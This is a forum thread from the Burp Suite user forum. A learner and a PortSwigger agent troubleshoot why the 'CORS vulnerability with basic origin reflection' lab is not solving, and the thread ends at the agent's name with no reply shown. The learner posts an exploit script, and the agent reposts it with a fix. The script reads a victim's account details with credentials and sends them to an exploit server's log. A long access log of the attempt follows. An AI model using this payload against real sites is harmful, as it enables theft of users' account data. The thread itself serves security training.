Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab is not solved by its own written solution

Constantine | Last updated: Jan 05, 2023 08:26AM UTC

I tried to solve the lab "CORS vulnerability with basic origin reflection" using the written solution.This is what it ends up showing in the accesslog "log?key=%22Resource%20not%20found%20-%20Academy%20Exploit%20Server%22" Last updated: Jan 04, 2023 10:31PM UTC | 0 Agent replies | 0 Community replies | How do I?

Ben, PortSwigger Agent | Last updated: Jan 05, 2023 11:33AM UTC

Hi Constantine, I believe that I have already answered your other forum post about this issue but, for completeness, I asked the following in the other thread: To confirm, what does your HTML script look like (the script that is mentioned in Step 5 of the solution)?

constantine | Last updated: Jan 05, 2023 05:31PM UTC

This is the script i used, thank you:<script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','0ae2007b0408d7f9c285b2a700ff007a.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script>

Ben, PortSwigger Agent | Last updated: Jan 05, 2023 06:24PM UTC

Hi Constantine, If you add https:// to the start of your lab ID URL does this then work for you i.e: var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0ae2007b0408d7f9c285b2a700ff007a.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script>

constantine | Last updated: Jan 05, 2023 06:50PM UTC

hello thanks for the help, but i tried it and it did not work. This is my access log below: 197.210.227.205 2023-01-05 18:38:07 +0000 "GET / HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.227.205 2023-01-05 18:38:07 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.55.247 2023-01-05 18:38:52 +0000 "POST / HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.226.164 2023-01-05 18:38:52 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.226.236 2023-01-05 18:38:55 +0000 "POST / HTTP/1.1" 302 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.227.205 2023-01-05 18:38:56 +0000 "GET /deliver-to-victim HTTP/1.1" 302 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 10.0.4.6 2023-01-05 18:38:56 +0000 "GET /exploit/ HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.124 Safari/537.36" 197.210.226.164 2023-01-05 18:38:57 +0000 "GET / HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.226.164 2023-01-05 18:38:57 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.227.205 2023-01-05 18:39:00 +0000 "POST / HTTP/1.1" 302 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.226.164 2023-01-05 18:39:00 +0000 "GET /log HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.55.247 2023-01-05 18:39:01 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.226.236 2023-01-05 18:41:27 +0000 "GET /log HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.227.205 2023-01-05 18:41:28 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.226.164 2023-01-05 18:41:44 +0000 "GET / HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.55.247 2023-01-05 18:41:45 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.226.236 2023-01-05 18:41:52 +0000 "POST / HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.226.164 2023-01-05 18:41:52 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.227.205 2023-01-05 18:42:25 +0000 "GET /exploit HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.226.236 2023-01-05 18:42:35 +0000 "GET / HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.226.164 2023-01-05 18:42:36 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.226.122 2023-01-05 18:42:42 +0000 "POST / HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.226.164 2023-01-05 18:42:43 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.55.247 2023-01-05 18:42:47 +0000 "POST / HTTP/1.1" 302 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.226.122 2023-01-05 18:42:47 +0000 "GET /deliver-to-victim HTTP/1.1" 302 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 10.0.4.6 2023-01-05 18:42:47 +0000 "GET /exploit/ HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.124 Safari/537.36" 197.210.226.236 2023-01-05 18:42:48 +0000 "GET / HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.226.164 2023-01-05 18:42:49 +0000 "GET /resources/css/labsDark.css HTTP/1.1" 200 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" 197.210.226.164 2023-01-05 18:42:52 +0000 "POST / HTTP/1.1" 302 "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"

Ben, PortSwigger Agent | Last updated: Jan 06, 2023 08:06AM UTC